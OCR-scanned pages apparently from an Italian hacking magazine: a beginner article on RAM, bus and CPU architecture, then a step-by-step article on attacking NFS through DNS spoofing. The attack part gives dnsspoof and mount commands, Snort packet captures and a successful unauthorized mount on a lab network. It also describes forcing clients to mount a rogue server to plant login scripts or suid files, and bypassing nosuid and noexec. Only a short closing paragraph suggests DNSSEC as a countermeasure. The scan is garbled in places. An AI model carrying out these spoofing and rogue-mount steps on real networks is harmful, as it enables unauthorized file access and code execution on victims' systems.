Input e/o di Output; Esse permettono lo 
scambio di informazioni tra l'elaboratore 




e il mondo esterno. Ad esempio, una pe- 
riferica di input è la tastiera, una di output 
la stampante. 

-BUS; è un insieme di linee che mettono 
in comunicazione tutti i componenti della 
macchina. 

Queste componenti CPU, memoria RAM 
e periferiche dialogano tra loro attraverso 
il BUS, seconodo lo schema mostrato in 
Figura 1 . 


r 


-{o)-- "(oy 


BUS 


CPU 



Periferica Periferica 


I/o 


I/o 


Figura 1 

L'architettura di un elaboratore 


» La memoria centrale 


Su questo argomento ci dilungheremo 
un po', perché è di fondamentale im- 
portanza per la comprensione di tutti gli 
altri. La RAM (o memoria centrale), è un 
particolare tipo di memoria che contie- 
ne le informazioni e i dati necessari per 
l'esecuzione dei programmi. E da di- 
stinguere dalle memorie di massa (co- 
me l'HD, floppy, ed...) per via delle sue 
principali caratteristiche: essa è fonda- 
mentalmente di dimensioni molto ri- 
dotte, è di tipo "volatile" (si perde il 
suo contenuto quando si spegne il PC 


(ecco perché si perdono i dati di ore e 
ore di lavoro quando spesso si impalla 
la mostruosa creature di Mr Gates...), è 
di accesso molto più veloce, ed è un 

passaggio obbligato nell'esecuzione dei 
programmi. 

Dal punto di vista fisico è un dispositivo 
a semiconduttori, con uno schema simi- 
le a quello di Figura 2. 
La memoria è strutturata come una se- 
quenza di celle di memoria, in cui ogni 
cella contiene una WORD (parola). ..di- 
ciamo semplicemente un "dato". Ogni 
incrocio tra righe e colonne (sarebbero i 
cerchietti della figura) assume un valore 
di tensione, se esso è alto equivalere al 
valore "1", se basso rappresenterà lo 
"0"...per questo motivo si dice che il 
computer ragiona in modo binario ed è 
per questo che nella scena finale del 
film "Matrix" quando "il messia" rag- 
giunge la completa forma riesce a per- 
cepire il mondo come è realmente fat- 
to. ..ovvero come lo vede la macchi- 
na. ..in binario! 


n 




bit 


1 2 3 4 5 6 7 8 

1 byte = 8 bit 


Figura 2 

Il funzionamento della RAM 
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Figura 3 



Trasferimento dei dati tra 

memoria e altri component 


Ritornando al nostro argomento principale 
(la memoria centrale), spieghiamo ora co- 
me la macchina esegue le operazioni di let- 
tura dalla memoria e scrittura in memoria: 
ogni cella di memoria può essere "indiriz- 
zata" (equivale ad assegnarle un numero a 
seconda della sua posizione) e quindi "pun- 
tata". ..(tranquilli, se avrete passione e tem- 
po tutto si chiarirà!). Le posizioni e gli indi- 
rizzi delle celle sono contenute tutte nel Re- 
gistro Indirizzi. 

Il Registro Dati, invece, contiene i dati 
che devono essere immagazzinati in me- 
moria, o che sono stati estratti da essa. 
Quando estraiamo un dato dalla memoria 
(per esempio un'immagine), noi indichiamo 
quale dato estrarre, il Registro Indirizzi ne 
fornisce la posizione e la CPU copia il con- 
tenuto della cella di memoria nel Registro 
Dati (lungo quanto una WORD), riempen- 
dolo (ovvero "caricandolo" in memoria). 


Nel momento in cui decidiamo di salvare 
un documento nel nostro picei, effettuiamo 
un'operazione di scrittura in memoria. Il 
computer altro non fa che copiare il Regi- 
stro Dati in una cella di memoria, deposi- 
tandolo (STORE). Il Bus mette in comunica- 




zione tutte le componenti della macchina, 
trasferendo informazioni tra CPU, Memo- 
ria ed interfaccie I/O. Il tutto avviene sotto 
la supervisione del processore che decide 
quali connessioni attivare tra Master (la 
CPU), e SLAVE (ad esempio RAM o I/O). 

I Principali tipi di BUS trasferiscono diversi 
tipi di informazione a seconda della loro 
funzione: 

II Bus Dati, in modalità "lettura", trasferi- 
sce dati da una cella di memoria al regi- 
stro dati; in modalità "scrittura" li trasferi- 
sce dal registro alla cella. 

Il Bus Indirizzi trasferisce il registro indi- 
rizzi alla memoria principale. 
C'è poi il Bus Controlli, che scambia in- 
formazioni tra Master e Slave. 
E' la parte della macchina che interpreta 
ed esegue effettivamente le istruzioni (ov- 
vero gli algoritmi tradotti in linguaggio 
macchina) del programma dopo aver 
estratto e decodificato le informazioni (che 
son tutte trasmesse in linguaggio binario). 


I principali elementi della CPU sono: 
-Unità di controlli: preleva, decodifica ed 
esegue elaborazioni e trasferimenti; 
Clock: (Orologio di sistema) sincroniz 
e coordina tutte le operazioni; 
-ALU: (Unità Aritmetico-Logica) realiz- 
za tutte le operazioni aritmetico logiche (ac 
dizione, algebra booleana...); 
Come abbiamo detto in precedenza, il prò- 


01010101 


Algoritmo: racchiude una serie 
di istruzioni precise e dettagliate 
per raggiungere un determinato 
scopo. (Es: Versare dell'acqua in 
un bicchiere: prendi il bicchiere, 
controlla se è pieno o vuoto; se 
è pieno lo scopo è raggiunto; in 
caso contrario prendi la bottiglia 
e versa l'acqua nel bicchiere.) 


cessore utilizza molti registri. Oltre a quelli 
già mensionati( Reg.Dati e Reg. Indirizzi) è 
bene ricordare il registro istruzione corren- 
te, il contatore programma, il registro inter- 
ruzioni, i registri di lavoro e tra gli altri l'im- 
portantissimo Registro di Stato, che riporta 
molte informazioni fondamentali sulle ope- 
razioni svolte dalla ALU. 


By Biulo 
arkanet@hotmail.com 


I tipi di memoria centrale non si limitano al- 
la RAM, esiste infatti un altro importante ti- 
po di memoria, spesso ignorato perke' non 
comunemente espandibile: parliamo della 
ROM (Read Only Memory). Questa zona di 
memoria in cui le operazioni sono limitate 
alla sola lettura, contiene le informazioni 
fondamentali per il funzionamento del si- 
stema, registrate in modo permanente e 
non volatile (definite spesso "Firmware"). 





01010101 


Figura 4 

Funzioni dei vari Bus della macchina 
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COME SFRUTTARE UN BACO DI BIND PER INSERIRSI IN UN FILE SYSTEM DI RETE 


Network File System attaccati con Dns Spoof ing 

Il seruizio DNS di Internet ha dei preoccupanti bachi di sicurezza, che possono 
essere utilizzati da burloni per spedire le persone su siti diuersi da quelli richiesti, 
ma che permettono anche di attaccare reti che basano l'autenticazione degli utenti 
su questo insicuro seruizio. 



espone il nostro sistema ad enormi rischi e andrebbe per tan- 
to evitata. Ad ogni modo vediamo come un attacker possa ser- 
virsi dello spoofing del DNS al fine di guadagnare un accesso 
non autorizzato ai rami condivisi del nostro filesystem. 


H Hostname 

ip 

Descrizione 

attack.linuxbox.com 

192.168.1.4 

Host dell'attacke 

dns.linuxbox.com 

192.168.1.5 

Server DNS 

attack.linuxbox.it 

192.168.1.6 

Client "fidato" 

victim.linuxbox.com 

192.168.1.7 

Server NFS 


Ecco un possibile scenario in cui potrebbe verificarsi un attacco 
alle risorse condivise del sistema victim operando da un ipote- 
tico sistema attack, gli host in gioco sono ancora una volta 
quelli utilizzati nel corso dell'esempio precedente: 
Il sistema victim.linuxbox.com si presenta configurato come se- 



elio scorso numero abbiamo visto come è possibile in- 
serirsi in una richiesta di connessione Internet utiliz- 
zando un baco del software Bind, che sovraintende il 
servizio Dns. Questa volta vediamo come questa falla 
può essere sfruttata per attaccare un Network File 
System (NFS). Se vi siete persi l'articolo precedente, 
andatevi a recuperare l'arretrato in formato Pdf, su www.hac- 
kerjounal.it; ne vale la pena. 

I servizi NFS sono stati sviluppati allo scopo di permettere il 
mount di partizioni di disco remote, se mal configurato questo 
servizio può essere tratto in inganno da un utente remoto non 
autorizzato che voglia accedere alle partizioni condivise. NFS si 
serve del file /etc/exports per determinare la legittimità o meno 
delle richieste di mount remote, in tale file sono pertanto indi- 
cate le risorse che si desidera condividere e le macchine auto- 
rizzate ad accedere a tali condivisioni. 

Al momento dell'avvio dei servizi NFS il file /etc/exports viene 
processato dal comando exportfs -r che viene di norma avviato 
automaticamente dallo script di inizializzazione dei servizi. Nel 
qual caso tale file contenesse riferimenti ad hostname il sistema 


» NFS seruer bypass 


sarà costretto alla risoluzione degli stessi mediante query DNS 
che potrebbero rendere il sistema soggetto ad accessi non au- 
torizzati. 

Come avrete avuto modo di capire, la pratica comune di inse- 
rire hostname all'interno di liste per il controllo degli accessi 


/etc/exports: 

/home/ftp trust.linuxbox.com(ro) 

Il file /etc/exports così dichiarato permette (dovrebbe permette- 
re) l'accesso in sola lettura (ro) alla home directory dell'utente ftp 
al solo sistema che risponde all'hostname trust.linuxbox.com. 

Vediamo cosa accade durante il boot del sistema nel momento 
in cui lo script rc.nfsd (Slackware8.0) inizializza i servizi NFS: 

Starting NFS services: 
/usr/sbin/exportfs -r 
/usr/sbin/rpc.rquotad 
/usr/sbin/rpc.nfsd 8 

/usr/sbin/rpc.mountd — no-nfs-version 3 
/usr/sbin/rpc.lockd 
/usr/sbin/rpc.statd 

Nel preciso istante in cui lo script rc.nfsd avvia exportfs -r il fi- 
le /etc/exports viene processato e il nome host trust.linux- 
box.com viene risolto nel relativo indirizzo IP tramite DNS 
query, in tal modo in presenza di una richiesta di mount futu- 
ra il server NFS non avrà più l'esigenza di interrogare il na- 
meserver ma si avvarrà dell'IP memorizzato a tempo di boot 
per soddisfare qualsiasi richiesta. Pertanto il solo momento in 
cui i servizi NFS risultano vulnerabili allo spoofing del DNS è 
rappresentato dal momento in cui esso aggiorna la tabella 
delle condivisioni, di norma tale operazione viene svolta du- 
rante il boot o su richiesta dell'amministratore. 


28 www.hackerjournal.it 


L'output di Snort ci offre la possibilità di loggare i pacchetti che 
transitano durante questa operazione, ovvero quali query ven- 
gono inoltrate da victim verso il DNS e quali risposte riceve da 
quest'ultimo: 


attacker@attack : ~# snort -vd udp port 53 
02/20-13:18:28.241483 192.168.1.7:1072 -> 192.168.1.5:53 
UDP TTL:120 TOS : 0x0 ID: 35227 IpLen:20 DgmLen:64 DF 
Len: 44 

4F 5D 01 00 00 01 00 00 00 00 00 00 05 74 72 75 0] tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com. 
00 01 00 01 


Victim invia una query intesa a risolvere l'hostname trust.linux- 
box.com che si trova nel file /etc/exports, questa operazione vie- 
ne eseguita a tempo di boot o su richiesta dell'admin... 


02/20-13:18:28.242207 192.168.1.5:53 -> 192.168.1.7:1072 
UDP TTL:64 TOS : 0x0 ID:395 IpLen:20 DgmLen:114 
Len : 94 

4F 5D 85 80 00 01 00 01 00 01 00 01 05 74 72 75 0] 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox 

00 01 00 01 CO OC 00 01 00 01 00 01 51 80 00 04 

CO A8 01 06 CO 12 00 02 00 01 00 01 51 80 00 06 

03 64 6E 73 CO 12 CO 40 00 01 00 01 00 01 51 80 .dns. . . @ . . . 

00 04 CO A8 01 05 


.tru 
com. 
Q... 
Q... 


Il server DNS restituisce a victim la risposta contenente TIP delT- 
hosttrust.linuxbox.com ovvero 192.168.1.6, in fututo quando il 
server NFS riceverà una richiesta di mount remota confronterà 
l'indirizzo IP del richiedente con quello ottenuto da questa reply 
e nel qual caso dovessero risultare uguali permetterà il pieno 
accesso al filesystem. 

La stessa query si ripete moltplici volte di conseguenza l'output 
restante di Snort è stato omesso in quanto ritenuto poco signifi- 
cativo. Se ora dovessimo provare a fare mount da un sistema 
diverso da trust il risultato sarebbe il seguente: 

attacker@attack:~# mount 192.168.1 .7:/home/ftp /mnt/nfs 
mount: 1 92.168.1 .7:/home/ftp failed, reason given by server: 
Permission 
denied 

Come atteso la nostra richiesta di mount viene scartata in quan- 
to proviene dall'IP 192.168.1.4 (attack) che è ben diverso dal- 


l'IP 192.168.1.6 (trust) risolto a boot time. E' importante notare 
che nel momento della richiesta di mount da parte di un client 
remoto il server NFS non ha la necessità di consultare il DNS in 
quanto la risoluzione dell'hostname è avvenuta a tempo di boot. 
Ne consegue che se un malintenzionato volesse eludere i con- 
trolli di sicurezza di NFS dovrebbe agire durante il processo di 
avvio del server, qui di seguito mi limito ad illustrare in pochi e 
semplici passi come potrebbe procedere al fine di perseguire il 
suo scopo: 

attacker@attack:~# dnsspoof -f —/hosts.txt 

dnsspoof: listening on ethO [udp dst port 53 and not src 

192.168.1.4] 

L'attacker mette in ascolto Dnsspoof sul proprio sistema in atte- 
sa di intercettare le DNS query causate dall'inizializzazione dei 
servizi NFS sulla macchina della vittima, nell'intento di restituire 
a victim delle reply a tali interrogazioni che riportino come IP del 
sistema trust l'IP stesso dell'host da cui l'attacker sta operando, 
ovvero 192.168.1.4. Le reply fasulle forgiate da Dnsspoof do- 
vranno giungere a victim prima che tale sistema sia raggiunto 
dalle reply lecite inviategli dal DNS. Qui di seguito vediamo i 
messaggi che il server victim invia verso l'output standard a te- 
stimonianza del fatto che sta procedendo all' inizializzazione di 
tali servizi: 

Starting NFS services: 
/usr/sbin/exportfs -r 
/usr/sbin/rpc.rquotad 
/usr/sbin/rpc.nfsd 8 

/usr/sbin/rpc.mountd — no-nfs-version 3 
/usr/sbin/rpc.lockd 
/usr/sbin/rpc.statd 

Segue poi l'output di Dnsspoof che ha catturato e risposto a 4 
query rivolte al nameserver (192.168.1.5) da parte di victim 
(192.168.1.7): 


attacker@attack:~# dnsspoof -f ~/hosts.txt 

dnsspoof: listening on ethO [udp dst port 53 and not src 

192.168.1.4] 

192.168.1.7.1074 > 192.168.1.5.53: 62892+ A? trust.liniaxbox.com 

192.168.1.7.1074 > 192.168.1.5.53: 62893+ A? trust.linuxbox.com 

192.168.1.7.1076 > 192.168.1.5.53: 6343+ A? trust.linuxbox.com 

192.168.1.7.1076 > 192.168.1.5.53: 6344+ A? trust.linuxbox.com 



Snort è un Network Intrusion Detector open source, disponibile per 
svariati sistemi *nix. Lo si può scaricare da www.snort.org 


Vediamo il tutto dalla prospettiva offerta da Snort, ovvero come 
si sono svolte le cose a livello di pacchetto: 


attacker@attack:~# snort -vd udp port 53 

02/20-14:29:39.685629 192.168.1.7:1074 -> 192.168.1.5:53 

UDP TTL:145 TOS : 0x0 ID:8247 IpLen:20 DgmLen:64 DF 

Len: 44 

F5 AC 01 00 00 01 00 00 00 00 00 00 05 74 72 75 

tru 

3 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li- 
nuxbox . com . 
00 01 00 01 

02/20-14:29:39.686343 192.168.1.5:53 -> 192.168.1.7:1074 
UDP TTL:64 TOS : 0x0 ID:416 IpLen:20 DgmLen:114 
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Len: 94 

F5 AC 85 80 00 01 00 01 00 01 00 01 05 74 72 75 

tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li- 

nuxbox . com . 

00 01 00 01 CO OC 00 01 00 01 00 01 51 80 00 04 

Q... 

CO A8 01 06 CO 12 00 02 00 01 00 01 51 80 00 06 

Q... 

03 64 6E 73 CO 12 CO 40 00 01 00 01 00 01 51 80 

.dns. . .@ Q. 

00 04 CO A8 01 05 


Questo secondo pacchetto è giunto a destinazione (victim) ma è 
stato ignorato in quanto PRECEDUTO dalla risposta fasulla for- 
nita da Dnsspoof. Ora non ci resta che terminare l'esecuzione 
di Dnsspoof e accedere alle condivisioni di victim come se fossi- 
mo Thost legittimo: 

attacker@attack:~# mount 192.168.1 .7:/home/ftp /mnt/nfs 
attacker@attack:~# 

Ora abbiamo accesso in sola lettura (ro) al ramo del filesystem 
remoto, e possiamo incominciare a riflettere sui reali problemi 
in cui possiamo incorrere a causa di un'amministrazione super- 
ficiale di tali risorse. 


» I comando Euports 

Questo comando viene utilizzato per mantenere aggiornata la 
tabella delle condivisioni sul sistema server, in particolare è lo 
script di inizializzazione dei servizi NFS stesso a preoccuparsi 
di svolgere tale mansione per mezzo della chiamata exportfs - 
r. Tuttavia tale comando può contribuire ad aprire un varco 
nella sicurezza del sistema qualora venga richiamato in un 
tempo successivo all' esecuzione del demone mountd, questo 
può verificarsi a causa di uno script inaffidabile o per mano 
dell'admin che richiama tale comando da console. Ho effet- 
tuato questa scoperta in maniera del tutto casuale durante i 
probe che ho effettuato lungo il corso della stesura del pre- 
sente articolo, premetto che ho avuto modo di testare il pre- 
sunto bug solo su un sistema che monta Slackware8.0 e ker- 
nel 2.4.17. 

Ecco un esempio, mettiamo che l'admin decida di modificare 
il file /etc/exports e di conseguenza debba aggiornare le ta- 
belle delle condivisioni con l'ausilio di exportfs -r senza prima 
provvedere all' arresto dei demoni interessati: 

victim@victim:~# exportfs -r 

Come possiamo vedere dall'output di Snort riportato qui di se- 
guito, il file /etc/exports viene processato e l'hostname (trust) 
contenuto in esso viene risolto nell'IP corrispondente 
(192.168.1.6): 


attacker@attack:~# snort -vd udp port 53 

02/20-14:49:48.213636 192.168.1.7:1079 -> 192.168.1.5:53 

UDP TTL:236 TOS:0x0 ID: 19927 IpLen:20 DgmLen:64 DF 

Len: 44 

CD 39 01 00 00 01 00 00 00 00 00 00 05 74 72 75 


.9 tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st . li- 

nuxbox . com . 

00 01 00 01 

02/20-14:49:48.214328 192.168.1.5:53 -> 192.168.1.7:1079 

UDP TTL:64 TOS : 0x0 ID:426 IpLen:20 DgmLen:114 

Len: 94 

CD 39 85 80 00 01 00 01 00 01 00 01 05 74 72 75 

.9 tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st . li- 

nuxbox . com . 

00 01 00 01 CO OC 00 01 00 01 00 01 51 80 00 04 

Q... 

CO A8 01 06 CO 12 00 02 00 01 00 01 51 80 00 06 

Q... 

03 64 6E 73 CO 12 CO 40 00 01 00 01 00 01 51 80 

. dns . . . @ Q . 

00 04 CO A8 01 05 


A questo punto nel momento stesso in cui facciamo il primo ten- 
tativo di mount da un host non autorizzato notiamo una cosa 
molto strana, ossia... 


attacker@attack:~# snort -vd udp port 53 

02/20-14:52:05.417517 192.168.1.7:1079 -> 192.168.1.5:53 

UDP TTL:197 TOS : 0x0 ID: 25875 IpLen:20 DgmLen:64 DF 

Len: 44 

28 CB 01 00 00 01 00 00 00 00 00 00 05 74 72 75 

( tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st . li- 

nuxbox . com . 

00 01 00 01 

02/20-14:52:05.418237 192.168.1.5:53 -> 192.168.1.7:1079 

UDP TTL:64 TOS: 0x0 ID:429 IpLen:20 DgmLen:114 

Len: 94 

28 CB 85 80 00 01 00 01 00 01 00 01 05 74 72 75 

( tru 

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li- 

nuxbox.com. 

00 01 00 01 CO OC 00 01 00 01 00 01 51 80 00 04 

Q... 

CO A8 01 06 CO 12 00 02 00 01 00 01 51 80 00 06 

Q... 

03 64 6E 73 CO 12 CO 40 00 01 00 01 00 01 51 80 

.dns. . . @ Q. 

00 04 CO A8 01 05 


Facciamo il punto della situazione: 

- i demoni erano in esecuzione 

- viene richiamato exportfs -r 

- trust.linuxbox.com viene risolto in 192.168.1.6 - tale IP viene 
memorizzato per impedire query durante le richieste di mount 
che potranno verificarsi in futuro e che sarebbero altriementi 
soggette a vulnerabilità dovute al DNS spoofing 

- prima richiesta di mount 

- viene nuovamente richiesta la risoluzione di trust!!! 

In parole povere, se exportfs -r è stato richiamato mentre mountd 
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era in esecuzione, e siamo i primi a richiedere il mount, allora 
causeremo una query DNS da parte di victim e saremo in grado 
di fornire una risposta arbitraria avvalendosi di Dnsspoof e per- 
mettendo il mount del filesystem da parte dell'host desiderato! 
per esempio, l'admin ha appena modificato il file delle esporta- 
zioni e desidera che le modifiche apportate abbiano effetto, a ta- 
le scopo esegue il comando necessario (il demone mountd è in 


esecuzione : 


attacker@attack:~# dnsspoof -f —/hosts.txt 

dnsspoof: listening on ethO [udp dst port 53 and not src 1 92.1 68.1 .4 

La vittima richiede di montare la porzione di filesystem /home/ftp 
dal sistema trust... 

victim@victim:~# mount trust. linuxbox.com :/home/ftp /mnt/nfs 
victim@victim:~# 


victim@victim:~# exportfs -r 

Terminata l'esecuzione del comando exportfs, l'attacker pone 
Dnsspoof in ascolto su H'interf accia di rete e... 

attacker@attack:~# dnsspoof -f ~7hosts.txt 

dnsspoof: listening on ethO [udp dst port 53 and not src 

192.168.1.4] 

...si prepara a richiedere il mount: 

attacker@attack:~# mount 192.168.1 .7:/home/ftp /mnt/nfs 
attacker@attack: ~# 

le query rivolte a risolvere l'hostname di trust.linuxbox.com ven- 
gono intercettate e le risposte fasulle vengono inviate al server 
NFS victim che permette il mount da parte del sistema attacker: 

attacker@attack:~# dnsspoof -f ~7hosts.txt 
dnsspoof: listening on ethO [udp dst port 53 and not src 1 92.1 68.1 .4] 
192.168.1.7.1034 > 192.168.1.5.53: 43182+ A? trust.linuxbox.com 
192.168.1.7.1034 > 192.168.1.5.53: 43183+ A? trust.linuxbox.com 


» NFS client bypass 


Ora la situazione si è invertita, la vittima è il client NFS e deve 
accedere al server NFS trust.linuxbox.com al quale ha accesso 
regolare. Lo scopo di colui che attacca è quello di far connette- 
re in maniera del tutto inconsapevole la vittima a un server NFS 
fasullo. Nell'esempio il server NFS "aggressivo" si trova sul si- 
stema stesso dell'attacker da cui partirà l'attacco di DNS spoo- 
fing. Ancora una volta condizione necessaria alla riuscita del- 
l'attacco è data dall'utilizzo del nome host da parte del lato 
client NFS al fine di accedere alle risorse remote. L'attacker de- 
ve disporre sul server NFS fasullo (il sistema attack.linuxbox.com) 
un file exports che permetta l'accesso inconsapevole della vittima: 

/etc/exports: 

/home/ftp 192.1 68. 1.7(ro) 

l'attacker mette in ascolto Dnsspoof, in questo modo qualsiasi ri- 
chiesta di mount da parte di un client NFS che abbia come desti- 
natario il sistema trust verrà reindirizzata verso il server NFS fasul- 
lo (attack) in maniera del tutto trasparente alla vittima: 


H Hostname 


attack.linuxbox.com 
dns.linuxbox.com 
trust.linuxbox.it 
victim.linuxbox.com 


192.168.1.4 
192.168.1.5 
192.168.1.6 
192.168.1.7 


Descrizione 


Server NFS Fasullo 
Server DNS 
Client "fidato" 
Client NFS 


...in realtà la sua richiesta viene inoltrata a 192.168.1.4, IP sug- 
geritogli dalla reply fasulla forgiata da Dnsspoof: 

attacker@attack:~# dnsspoof -f —/hosts.txt 

dnsspoof: listening on ethO [udp dst port 53 and not src 1 92.1 68.1 .4] 

192.168.1.7.1034> 192.168.1.5.53: 62600+ A? trust.linuxbox.com 

Una pratica comune che sarebbe bene evitare è quella di in- 
serire una voce in /etc/fstab che esegua il mount di un filesy- 
stem NFS, il fatto stesso di automatizzare l'operazione espone 
i client NFS a rischi ancora maggiori. 

Ora vi starete chiedendo, "che interessi può avere un utente 
malizioso ad ingannare un client NFS al fine di forzare il 
mount di un filesystem differente da quello previsto"? Ecco al- 
cuni esempi: 

1) Molti sistemi con funzione di workstation montano le /home 
degli utenti da remoto durante il boot; se un attacker fosse in 
grado di forzare il mount in lettura/scrittura di una home fitti- 
zia che si trova sul proprio sistema, potrebbe venire in posses- 
so di dati di fondamentale importanza per l'integrità dell'ac- 
count utente attaccato, quali ad esempio .bash_hi story. 

2) Come nell'esempio precedente, se l'attacker fosse in grado 
di montare una directory home fittizia potrebbe inserire in es- 
sa script come .bash_profile o .bashrc in grado di eseguire po- 
tenzialmente qualsiasi operazione al momento del login. 

3) Se l'attacker ha accesso al sistema victim come utente ge- 
nerico e tale sistema, in seguito alla presenza di una voce nel 
file /etc/fstab, esegue un mount automatico tramite NFS, po- 
trà essere forzato a montare un filesystem aggressivo al fine di 
mettere a disposizione di attacker file potenzialmente dannosi 
per la sicurezza stessa del sistema, per esempio suid shell o 
script peri setuserid. L'utilizzo delle opzioni nosuid e noexec del 
comando mount non sempre offrono la sicurezza sperata, e 
possono essere aggirate agilmente con semplici accorgimenti: 

- nosuid NON impedisce l'esecuzione di script Perl tramite 
Suidperl 

- noexec NON impedisce che i file dannosi vengano copiati su 
un altro filesystem dove potranno essere eseguiti. 


» Quali cntromisure prendere 

Un buon rimedio è rappresentato dall'utilizzo di software qua- 
le DNSSEC che applica una firma digitale per assicurare la 
provenienza legittima delle reply da parte di un server DNS 
autorizzato. Effetti collaterali quali la necessità di maggiore 
banda a disposizione, maggior mole di lavoro per la macchi- 
na e per l'amministratore del sistema sono la causa principa- 
le della lenta diffusione di DNSSEC. m 

E4zy ~ OQ Staff 
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